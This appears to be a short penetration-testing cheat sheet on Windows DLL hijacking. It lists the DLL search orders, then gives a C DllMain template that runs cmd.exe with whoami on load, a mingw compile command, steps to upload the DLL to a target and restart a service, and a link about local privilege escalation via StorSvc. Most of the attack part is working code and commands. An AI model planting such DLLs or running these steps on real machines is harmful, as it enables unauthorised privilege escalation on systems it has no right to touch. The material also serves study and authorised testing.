# DLL Hijacking
## Basics
### Search Orders
* With __SafeDllSearchMode__ enabled, paths are searched in the following order:
* __cwd__ of executable
* System directory, `GetSystemDirectory`
* 16-bit system directory
* Windows, `GetWindowsDirectory`
* __pwd__
* PATH
* With __SafeDllSearchMode__ disabled, paths are searched in the following order:
* __cwd__ of executable
* __pwd__
* System directory
* 16-bit system directory
* Windows directory
* PATH environment variable
### Template
```C
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    /* Entry point the loader calls for every attach/detach notification;
     * only the initial process attach is acted on, the other reasons
     * (thread attach/detach, process detach) fall through to the return. */
    if (dwReason == DLL_PROCESS_ATTACH) {
        /* system() is declared in <stdlib.h>, which this file does not include
         * explicitly - NOTE(review): confirm the build does not rely on an
         * implicit declaration. The call spawns cmd.exe as a child of the
         * loading process (a visible parent/child relationship for process
         * monitoring), and `/k` keeps that shell alive after `whoami`
         * finishes, so system() does not return until the shell exits. */
        system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
        /* Terminates the whole hosting process, not just this DLL; a service
         * that loads this library therefore never finishes starting. */
        ExitProcess(0);
    }
    /* TRUE tells the loader the attach succeeded; returning FALSE on
     * DLL_PROCESS_ATTACH would make the load fail instead. */
    return TRUE;
}
```
* Compilation via
```sh
x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
```
* Upload to target
* Restart the dllsvc service via
```sh
sc stop dllsvc
sc start dllsvc
```
## LPE via StorSvc
* [BlackArrowSec's repository](https://t.co/8XMvewhgFn)